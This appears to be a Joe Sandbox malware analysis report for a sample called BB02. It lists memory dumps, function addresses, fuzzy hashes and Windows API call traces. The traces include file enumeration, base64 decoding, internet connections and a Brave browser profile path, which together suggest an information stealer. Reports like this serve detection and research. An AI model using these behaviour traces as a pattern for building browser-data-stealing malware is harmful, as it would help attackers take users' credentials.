Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1b2d372935be8b3f06fb6a8661012cd35c8ed29a4714ce1eb70eff5b8d7100e8
Instruction ID: d5213ce56d19ccab4b54554078f0f9591c11fd9792c964766793415fd4e25809
Opcode Fuzzy Hash: 1b2d372935be8b3f06fb6a8661012cd35c8ed29a4714ce1eb70eff5b8d7100e8
Instruction Fuzzy Hash: 3211E5B07201459BCB24FF7ADD4AADF37A4AF44304F404139BC88AB2E2DA78ED458795

Function 00A1D0FD Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00A1D14E

Memory Dump Source

Source File: 00000001.00000002.2071390992.0000000000A1C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A1C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a1c000_BB02.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 1f5d888cff2bcd8c1d893e927dcb7c071486d66359fe45886504ffdf2fb29056
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: B8112D79A00208FFDB01DF98C985E99BBF5AF08350F058094F9489B362D371EA90DF80

Non-executed Functions

Function 024E1807 Relevance: 172.2, APIs: 114, Instructions: 1164stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 024E1849
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024E1880
lstrcpy.KERNEL32(00000000,00000000), ref: 024E18D3
lstrcat.KERNEL32(00000000), ref: 024E18DD
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1909
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1956
lstrcat.KERNEL32(00000000,00000000), ref: 024E1960
lstrcpy.KERNEL32(00000000,00000000), ref: 024E198C
lstrcpy.KERNEL32(00000000,00000000), ref: 024E19DC
lstrcat.KERNEL32(00000000), ref: 024E19E6
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1A12
lstrcpy.KERNEL32(00000000,?), ref: 024E1A5A
lstrcat.KERNEL32(00000000,00000000), ref: 024E1A65
lstrlen.KERNEL32(00431D64), ref: 024E1A70
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1A90
lstrcat.KERNEL32(00000000,00431D64), ref: 024E1A9C
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1AC2
lstrcat.KERNEL32(00000000,00000000), ref: 024E1ACD
lstrlen.KERNEL32(00431D68), ref: 024E1AD8
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1AF5
lstrcat.KERNEL32(00000000,00431D68), ref: 024E1B01

Part of subcall function 02504287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 025042B4
Part of subcall function 02504287: lstrcpy.KERNEL32(00000000,?), ref: 025042E9

lstrcpy.KERNEL32(00000000,00000000), ref: 024E1B2A
lstrcpy.KERNEL32(00000000,?), ref: 024E1B75
lstrcat.KERNEL32(00000000,00000000), ref: 024E1B7D
lstrlen.KERNEL32(00431D64), ref: 024E1B88
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1BA8
lstrcat.KERNEL32(00000000,00431D64), ref: 024E1BB4
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1BDD
lstrcat.KERNEL32(00000000,00000000), ref: 024E1BE8
lstrlen.KERNEL32(00431D64), ref: 024E1BF3
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1C13
lstrcat.KERNEL32(00000000,00431D64), ref: 024E1C1F
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1C45
lstrcat.KERNEL32(00000000,00000000), ref: 024E1C50
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1C78
FindFirstFileA.KERNEL32(00000000,?), ref: 024E1CAC
StrCmpCA.SHLWAPI(?,00431D70), ref: 024E1CD7
StrCmpCA.SHLWAPI(?,00431D74), ref: 024E1CF1
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024E1D2B
lstrcpy.KERNEL32(00000000,?), ref: 024E1D62
lstrcat.KERNEL32(00000000,00000000), ref: 024E1D6A
lstrlen.KERNEL32(00431D64), ref: 024E1D75
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1D98
lstrcat.KERNEL32(00000000,00431D64), ref: 024E1DA4
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1DD0
lstrcat.KERNEL32(00000000,00000000), ref: 024E1DDB
lstrlen.KERNEL32(00431D64), ref: 024E1DE6
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1E09
lstrcat.KERNEL32(00000000,00431D64), ref: 024E1E15
lstrlen.KERNEL32(?), ref: 024E1E22
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1E42
lstrcat.KERNEL32(00000000,?), ref: 024E1E50
lstrlen.KERNEL32(00431D64), ref: 024E1E5B
lstrcpy.KERNEL32(00000000,?), ref: 024E1E7B
lstrcat.KERNEL32(00000000,00431D64), ref: 024E1E87
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1EAD
lstrcat.KERNEL32(00000000,00000000), ref: 024E1EB8
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1EE4
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1F47
lstrcat.KERNEL32(00000000,00000000), ref: 024E1F52
lstrlen.KERNEL32(00431D64), ref: 024E1F5D
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1F80
lstrcat.KERNEL32(00000000,00431D64), ref: 024E1F8C
lstrcpy.KERNEL32(00000000,00000000), ref: 024E1FB2
lstrcat.KERNEL32(00000000,00000000), ref: 024E1FBD
lstrlen.KERNEL32(00431D64), ref: 024E1FC8
lstrcpy.KERNEL32(00000000,?), ref: 024E1FE8
lstrcat.KERNEL32(00000000,00431D64), ref: 024E1FF4
lstrlen.KERNEL32(?), ref: 024E2001
lstrcpy.KERNEL32(00000000,00000000), ref: 024E2021
lstrcat.KERNEL32(00000000,?), ref: 024E202F
lstrcpy.KERNEL32(00000000,00000000), ref: 024E205B
lstrcpy.KERNEL32(00000000,00000000), ref: 024E20A5
GetFileAttributesA.KERNEL32(00000000), ref: 024E20AC
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024E2106
lstrlen.KERNEL32(006389F0), ref: 024E2115
lstrcpy.KERNEL32(00000000,?), ref: 024E2142
lstrcat.KERNEL32(00000000,?), ref: 024E214A
lstrlen.KERNEL32(00431D64), ref: 024E2155
lstrcpy.KERNEL32(00000000,00000000), ref: 024E2175
lstrcat.KERNEL32(00000000,00431D64), ref: 024E2181
lstrcpy.KERNEL32(00000000,?), ref: 024E21A9
lstrcat.KERNEL32(00000000,00000000), ref: 024E21B4
lstrlen.KERNEL32(00431D64), ref: 024E21BF
lstrcpy.KERNEL32(00000000,00000000), ref: 024E21DC
lstrcat.KERNEL32(00000000,00431D64), ref: 024E21E8

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
String ID:
API String ID: 4127656590-0
Opcode ID: 58bcd7dfca981f448704edd035e49fb4acc7a00dca7f0eefd485a99d3c8059f6
Instruction ID: 93dcb9906c4ebca5e930b33cc7150e6e599cf03e0e467f2795983ffaee97cba5
Opcode Fuzzy Hash: 58bcd7dfca981f448704edd035e49fb4acc7a00dca7f0eefd485a99d3c8059f6
Instruction Fuzzy Hash: D29221719016569FEF21EF75CC84AAF77BAAF4470AF04411AE80AA7250DBB4DD01DFA0

Function 024F7047 Relevance: 147.8, APIs: 83, Strings: 1, Instructions: 752stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F707C
SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 024F70AF
lstrcpy.KERNEL32(00000000,00000000), ref: 024F70E9
lstrcpy.KERNEL32(00000000,00000000), ref: 024F7110
lstrcat.KERNEL32(00000000,00000000), ref: 024F711B
lstrcpy.KERNEL32(00000000,00000000), ref: 024F7144
lstrlen.KERNEL32(00435320), ref: 024F715E
lstrcpy.KERNEL32(00000000,00000000), ref: 024F7180
lstrcat.KERNEL32(00000000,00435320), ref: 024F718C
lstrcpy.KERNEL32(00000000,00000000), ref: 024F71B7
lstrcpy.KERNEL32(00000000,00000000), ref: 024F71E7
LocalAlloc.KERNEL32(00000040,?), ref: 024F721C
strtok_s.MSVCRT ref: 024F7249
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F7284
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F72B4

Strings

hSC, xrefs: 024F7651, 024F7654, 024F76CD

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlenstrtok_s
String ID: hSC
API String ID: 922491270-3351665975
Opcode ID: 74298f0b8d8d5e5808ef7b85f628bb230d045c4728235006b36d07a30008f6f0
Instruction ID: 9e474908cf5313fe90ffbb882dedd72a2b6650d8aef96333b24c593238a0bed8
Opcode Fuzzy Hash: 74298f0b8d8d5e5808ef7b85f628bb230d045c4728235006b36d07a30008f6f0
Instruction Fuzzy Hash: 7342B570A00215AFEB11EF74DC88F6FBBBAAF44705F14541AE906A7251DBB8D901DFA0

Function 024F1EA7 Relevance: 132.9, APIs: 88, Instructions: 909stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F1ED9
lstrlen.KERNEL32(00431D68), ref: 024F1EE4
lstrcpy.KERNEL32(00000000,?), ref: 024F1F06
lstrcat.KERNEL32(00000000,00431D68), ref: 024F1F12
lstrcpy.KERNEL32(00000000,00000000), ref: 024F1F39
FindFirstFileA.KERNEL32(00000000,?), ref: 024F1F4E
StrCmpCA.SHLWAPI(?,00431D70), ref: 024F1F6E
StrCmpCA.SHLWAPI(?,00431D74), ref: 024F1F88
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F1FC6
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F1FF9
lstrcpy.KERNEL32(00000000,?), ref: 024F2021
lstrcat.KERNEL32(00000000,00000000), ref: 024F202C
lstrcpy.KERNEL32(00000000,00000000), ref: 024F2053
lstrlen.KERNEL32(00431D64), ref: 024F2065
lstrcpy.KERNEL32(00000000,00000000), ref: 024F2087
lstrcat.KERNEL32(00000000,00431D64), ref: 024F2093
lstrcpy.KERNEL32(00000000,00000000), ref: 024F20BB
lstrlen.KERNEL32(?), ref: 024F20CF
lstrcpy.KERNEL32(00000000,00000000), ref: 024F20EC
lstrcat.KERNEL32(00000000,?), ref: 024F20FA
lstrcpy.KERNEL32(00000000,00000000), ref: 024F2120
lstrlen.KERNEL32(00638D00), ref: 024F2136
lstrcpy.KERNEL32(00000000,00000000), ref: 024F2160
lstrcat.KERNEL32(00000000,00000000), ref: 024F216B
lstrcpy.KERNEL32(00000000,00000000), ref: 024F2196
lstrlen.KERNEL32(00431D64), ref: 024F21A8
lstrcpy.KERNEL32(00000000,00000000), ref: 024F21CA
lstrcat.KERNEL32(00000000,00431D64), ref: 024F21D6
lstrcpy.KERNEL32(00000000,00000000), ref: 024F21FF
lstrcpy.KERNEL32(00000000,00000000), ref: 024F222C
lstrcat.KERNEL32(00000000,00000000), ref: 024F2237
lstrcpy.KERNEL32(00000000,00000000), ref: 024F225E
lstrlen.KERNEL32(00431D64), ref: 024F2270
lstrcpy.KERNEL32(00000000,00000000), ref: 024F2292
lstrcat.KERNEL32(00000000,00431D64), ref: 024F229E
lstrcpy.KERNEL32(00000000,00000000), ref: 024F22C7
lstrcpy.KERNEL32(00000000,00000000), ref: 024F22F6
lstrcat.KERNEL32(00000000,00000000), ref: 024F2301
lstrcpy.KERNEL32(00000000,00000000), ref: 024F2328
lstrlen.KERNEL32(00431D64), ref: 024F233A
lstrcpy.KERNEL32(00000000,00000000), ref: 024F235C
lstrcat.KERNEL32(00000000,00431D64), ref: 024F2368
lstrcpy.KERNEL32(00000000,00000000), ref: 024F2391
lstrcpy.KERNEL32(00000000,00000000), ref: 024F23C0
lstrcat.KERNEL32(00000000,00000000), ref: 024F23CB
lstrcpy.KERNEL32(00000000,00000000), ref: 024F23F4
lstrlen.KERNEL32(00431D64), ref: 024F2420
lstrcpy.KERNEL32(00000000,00000000), ref: 024F243D
lstrcat.KERNEL32(00000000,00431D64), ref: 024F2449
lstrcpy.KERNEL32(00000000,00000000), ref: 024F246F
lstrlen.KERNEL32(006389A8), ref: 024F2485
lstrcpy.KERNEL32(00000000,00000000), ref: 024F24B9
lstrlen.KERNEL32(00431D64), ref: 024F24CD
lstrcpy.KERNEL32(00000000,00000000), ref: 024F24EA
lstrcat.KERNEL32(00000000,00431D64), ref: 024F24F6
lstrcpy.KERNEL32(00000000,00000000), ref: 024F251C
lstrlen.KERNEL32(00638BDC), ref: 024F2532
lstrcpy.KERNEL32(00000000,00000000), ref: 024F2566
lstrlen.KERNEL32(00431D64), ref: 024F257A
lstrcpy.KERNEL32(00000000,00000000), ref: 024F2597
lstrcat.KERNEL32(00000000,00431D64), ref: 024F25A3
lstrcpy.KERNEL32(00000000,00000000), ref: 024F25C9
lstrlen.KERNEL32(00638CE8), ref: 024F25DF
lstrcpy.KERNEL32(00000000,00000000), ref: 024F2607
lstrcat.KERNEL32(00000000,00000000), ref: 024F2612
lstrcpy.KERNEL32(00000000,00000000), ref: 024F263D
lstrlen.KERNEL32(00431D64), ref: 024F264F
lstrcpy.KERNEL32(00000000,00000000), ref: 024F266E
lstrcat.KERNEL32(00000000,00431D64), ref: 024F267A
lstrcpy.KERNEL32(00000000,00000000), ref: 024F269F
lstrlen.KERNEL32(?), ref: 024F26B3
lstrcpy.KERNEL32(00000000,00000000), ref: 024F26D7
lstrcat.KERNEL32(00000000,?), ref: 024F26E5
lstrcpy.KERNEL32(00000000,00000000), ref: 024F270A
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F2746
lstrlen.KERNEL32(00638CA4), ref: 024F2755
lstrcpy.KERNEL32(00000000,00000000), ref: 024F277D
lstrcat.KERNEL32(00000000,00000000), ref: 024F2788

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
String ID:
API String ID: 712834838-0
Opcode ID: cc33be6ce75fcd50f2f3e77070ad771e1d50a9dd59699009f98acb36ec3c53b7
Instruction ID: ef8529ae6ead81f4d0350f93298a9eaacef031908e86fbf77c4a50beac58296d
Opcode Fuzzy Hash: cc33be6ce75fcd50f2f3e77070ad771e1d50a9dd59699009f98acb36ec3c53b7
Instruction Fuzzy Hash: A76251719016169FEB21EF75CC88AAF77BBAF84709F04052AED05A7250DBB4D901DFA0

Function 024E6267 Relevance: 128.6, APIs: 68, Strings: 5, Instructions: 817stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 024E6296
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024E62E9
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024E631C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024E634C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024E6387
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024E63BA
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 024E63CA

Strings

", xrefs: 024E682E, 024E691C
------, xrefs: 024E64F0, 024E651D, 024E6795, 024E6886
TPC, xrefs: 024E67D2
TPC, xrefs: 024E6868
TPC, xrefs: 024E68C0

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------$TPC$TPC$TPC
API String ID: 2041821634-3953685780
Opcode ID: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
Instruction ID: 3246de2192f86190ef50deeb7b3d49dbea59abf30dbce277423b1914b40e8bbc
Opcode Fuzzy Hash: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
Instruction Fuzzy Hash: 125243719006569FEF20EF75DC84AAE77BAAF4830AF154429E806AB250DB74ED01CF94

Function 024F3F27 Relevance: 122.4, APIs: 81, Instructions: 869stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 024F3F43
FindFirstFileA.KERNEL32(?,?), ref: 024F3F5A
StrCmpCA.SHLWAPI(?,00431D70), ref: 024F3F83
StrCmpCA.SHLWAPI(?,00431D74), ref: 024F3F9D
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F3FD6
lstrcpy.KERNEL32(00000000,?), ref: 024F3FFE
lstrcat.KERNEL32(00000000,00000000), ref: 024F4009
lstrlen.KERNEL32(00431D64), ref: 024F4014
lstrcpy.KERNEL32(00000000,00000000), ref: 024F4031
lstrcat.KERNEL32(00000000,00431D64), ref: 024F403D
lstrlen.KERNEL32(?), ref: 024F404A
lstrcpy.KERNEL32(00000000,00000000), ref: 024F406A
lstrcat.KERNEL32(00000000,?), ref: 024F4078
lstrcpy.KERNEL32(00000000,00000000), ref: 024F40A1
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F40E5
lstrlen.KERNEL32(?), ref: 024F40EF
lstrcpy.KERNEL32(00000000,00000000), ref: 024F411C
lstrcat.KERNEL32(00000000,00000000), ref: 024F4127
lstrcpy.KERNEL32(00000000,00000000), ref: 024F414D
lstrlen.KERNEL32(00431D64), ref: 024F415F
lstrcpy.KERNEL32(00000000,00000000), ref: 024F4181
lstrcat.KERNEL32(00000000,00431D64), ref: 024F418D
lstrcpy.KERNEL32(00000000,00000000), ref: 024F41B5
lstrlen.KERNEL32(?), ref: 024F41C9
lstrcpy.KERNEL32(00000000,00000000), ref: 024F41E9
lstrcat.KERNEL32(00000000,?), ref: 024F41F7
lstrlen.KERNEL32(006389F0), ref: 024F4222
lstrcpy.KERNEL32(00000000,00000000), ref: 024F4248
lstrcat.KERNEL32(00000000,00000000), ref: 024F4253
lstrlen.KERNEL32(00638D00), ref: 024F4275
lstrcpy.KERNEL32(00000000,00000000), ref: 024F429B
lstrcat.KERNEL32(00000000,00000000), ref: 024F42A6
lstrcpy.KERNEL32(00000000,00000000), ref: 024F42CE
lstrlen.KERNEL32(00431D64), ref: 024F42E0
lstrcpy.KERNEL32(00000000,00000000), ref: 024F42FF
lstrcat.KERNEL32(00000000,00431D64), ref: 024F430B
lstrcpy.KERNEL32(00000000,00000000), ref: 024F4331
lstrcpy.KERNEL32(00000000,?), ref: 024F435E
lstrcat.KERNEL32(00000000,00000000), ref: 024F4369
lstrcpy.KERNEL32(00000000,00000000), ref: 024F4390
lstrlen.KERNEL32(00431D64), ref: 024F43A2
lstrcpy.KERNEL32(00000000,00000000), ref: 024F43C4
lstrcat.KERNEL32(00000000,00431D64), ref: 024F43D0
lstrcpy.KERNEL32(00000000,00000000), ref: 024F43F9
lstrcpy.KERNEL32(00000000,00000000), ref: 024F4428
lstrcat.KERNEL32(00000000,00000000), ref: 024F4433
lstrcpy.KERNEL32(00000000,00000000), ref: 024F445A
lstrlen.KERNEL32(00431D64), ref: 024F446C
lstrcpy.KERNEL32(00000000,00000000), ref: 024F448E
lstrcat.KERNEL32(00000000,00431D64), ref: 024F449A
lstrcpy.KERNEL32(00000000,00000000), ref: 024F44C3
lstrcpy.KERNEL32(00000000,00000000), ref: 024F44F2
lstrcat.KERNEL32(00000000,00000000), ref: 024F44FD
lstrcpy.KERNEL32(00000000,00000000), ref: 024F4524
lstrlen.KERNEL32(00431D64), ref: 024F4536
lstrcpy.KERNEL32(00000000,00000000), ref: 024F4558
lstrcat.KERNEL32(00000000,00431D64), ref: 024F4564
lstrcpy.KERNEL32(00000000,00000000), ref: 024F458C
lstrlen.KERNEL32(?), ref: 024F45A0
lstrcpy.KERNEL32(00000000,00000000), ref: 024F45C0
lstrcat.KERNEL32(00000000,?), ref: 024F45CE
lstrcpy.KERNEL32(00000000,00000000), ref: 024F45F7
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F4636
lstrlen.KERNEL32(00638CA4), ref: 024F4645
lstrcpy.KERNEL32(00000000,00000000), ref: 024F466D
lstrcat.KERNEL32(00000000,00000000), ref: 024F4678
lstrcpy.KERNEL32(00000000,00000000), ref: 024F46A1
lstrcpy.KERNEL32(00000000,00000000), ref: 024F46E5
lstrcat.KERNEL32(00000000), ref: 024F46F2
FindNextFileA.KERNEL32(00000000,?), ref: 024F48F0
FindClose.KERNEL32(00000000), ref: 024F48FF

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 1006159827-0
Opcode ID: 293ed328344b4165c013f043e32d74a9a14dbec6b56df4621553222640ab2117
Instruction ID: 331255048c3feab8cd796c946cb871b0deff69e98da9145be5c823a6b15c6be5
Opcode Fuzzy Hash: 293ed328344b4165c013f043e32d74a9a14dbec6b56df4621553222640ab2117
Instruction Fuzzy Hash: 82627271901656AFEB21EF75CC48AAF77BAAF84709F04412AEA05A7350DF74D901CFA0

Function 024F7260 Relevance: 114.3, APIs: 64, Strings: 1, Instructions: 526stringmemoryencryptionCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F7284
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F72B4
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F72E4
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F7316
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 024F7323
RtlAllocateHeap.NTDLL(00000000), ref: 024F732A
StrStrA.SHLWAPI(00000000,00435350), ref: 024F7341
lstrlen.KERNEL32(00000000), ref: 024F734C
malloc.MSVCRT ref: 024F7356
strncpy.MSVCRT ref: 024F7364
lstrcpy.KERNEL32(00000000,00000000), ref: 024F738F
lstrcpy.KERNEL32(00000000,00000000), ref: 024F73B6
StrStrA.SHLWAPI(00000000,00435358), ref: 024F73C9
lstrlen.KERNEL32(00000000), ref: 024F73D4
malloc.MSVCRT ref: 024F73DE
strncpy.MSVCRT ref: 024F73EC
lstrcpy.KERNEL32(00000000,00000000), ref: 024F7417
lstrcpy.KERNEL32(00000000,00000000), ref: 024F743E
StrStrA.SHLWAPI(00000000,00435360), ref: 024F7451
lstrlen.KERNEL32(00000000), ref: 024F745C
malloc.MSVCRT ref: 024F7466
strncpy.MSVCRT ref: 024F7474
lstrcpy.KERNEL32(00000000,00000000), ref: 024F749F
lstrcpy.KERNEL32(00000000,00000000), ref: 024F74C6
StrStrA.SHLWAPI(00000000,00435368), ref: 024F74D9
lstrlen.KERNEL32(00000000), ref: 024F74E8
malloc.MSVCRT ref: 024F74F2
strncpy.MSVCRT ref: 024F7500
lstrcpy.KERNEL32(00000000,00000000), ref: 024F7530
lstrcpy.KERNEL32(00000000,00000000), ref: 024F7558
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 024F757B
LocalAlloc.KERNEL32(00000040,00000000), ref: 024F758F
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 024F75B0
LocalFree.KERNEL32(00000000), ref: 024F75BB
lstrlen.KERNEL32(?), ref: 024F7655
lstrlen.KERNEL32(?), ref: 024F7668
lstrlen.KERNEL32(?), ref: 024F767B

Strings

hSC, xrefs: 024F7651, 024F7654, 024F76CD

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$mallocstrncpy$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
String ID: hSC
API String ID: 2413810636-3351665975
Opcode ID: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
Instruction ID: 6e575cae330fd7c66cd713f00a9ca61e1b23b8365639cd26bff5f52d0937e407
Opcode Fuzzy Hash: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
Instruction Fuzzy Hash: 47028170A00215AFDB10EF74DC48EAEBBBAAF48705F14541AF906E7251DBB8D901DFA0

Function 024EDFD7 Relevance: 88.8, APIs: 48, Strings: 2, Instructions: 1264stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 024EE02A
lstrcpy.KERNEL32(00000000,?), ref: 024EE075
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024EE0B6
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024EE0E6
FindFirstFileA.KERNEL32(?,?), ref: 024EE0F7

Strings

\Brave\Preferences, xrefs: 024EE503
lRC, xrefs: 024EE03E

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindFirst
String ID: \Brave\Preferences$lRC
API String ID: 157892242-2889925444
Opcode ID: 2ae95654697341e2d9d78368bd15d2fdfc39750d280e88d0c6b86a57977b62f0
Instruction ID: a5876daffd6cc0d2e9114d2f43853769d2107b279909ffe2636a4c71d08a424c
Opcode Fuzzy Hash: 2ae95654697341e2d9d78368bd15d2fdfc39750d280e88d0c6b86a57977b62f0
Instruction Fuzzy Hash: 5AB27F70A002159FEF24DF65C884B9A77F6AF48319F18856EE80AAB351DB75EC41CF90

Function 024F1827 Relevance: 62.0, APIs: 41, Instructions: 526stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F1869
lstrcpy.KERNEL32(00000000,00000000), ref: 024F188C
lstrcat.KERNEL32(00000000,00000000), ref: 024F1897
lstrlen.KERNEL32(0043526C), ref: 024F18A2
lstrcpy.KERNEL32(00000000,00000000), ref: 024F18BF
lstrcat.KERNEL32(00000000,0043526C), ref: 024F18CB
lstrcpy.KERNEL32(00000000,00000000), ref: 024F18F9
FindFirstFileA.KERNEL32(00000000,?), ref: 024F1913
StrCmpCA.SHLWAPI(?,00431D70), ref: 024F1932
StrCmpCA.SHLWAPI(?,00431D74), ref: 024F194A
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F1987
lstrcpy.KERNEL32(00000000,?), ref: 024F19B0
lstrcat.KERNEL32(00000000,00000000), ref: 024F19BB
lstrlen.KERNEL32(00431D64), ref: 024F19C6
lstrcpy.KERNEL32(00000000,00000000), ref: 024F19E3
lstrcat.KERNEL32(00000000,00431D64), ref: 024F19EF
lstrlen.KERNEL32(?), ref: 024F19FA
lstrcpy.KERNEL32(00000000,00000000), ref: 024F1A1C
lstrcat.KERNEL32(00000000,?), ref: 024F1A28
lstrcpy.KERNEL32(00000000,00000000), ref: 024F1A55
StrCmpCA.SHLWAPI(?,00638C28), ref: 024F1A7C
lstrcpy.KERNEL32(00000000,?), ref: 024F1ABD
lstrcpy.KERNEL32(00000000,?), ref: 024F1AE6
lstrcpy.KERNEL32(00000000,?), ref: 024F1B1A
StrCmpCA.SHLWAPI(?,006388A8), ref: 024F1B35
lstrcpy.KERNEL32(00000000,?), ref: 024F1B76
lstrcpy.KERNEL32(00000000,?), ref: 024F1B9F
lstrcpy.KERNEL32(00000000,?), ref: 024F1BD3
StrCmpCA.SHLWAPI(?,00638E3C), ref: 024F1BEF
lstrcpy.KERNEL32(00000000,?), ref: 024F1C20
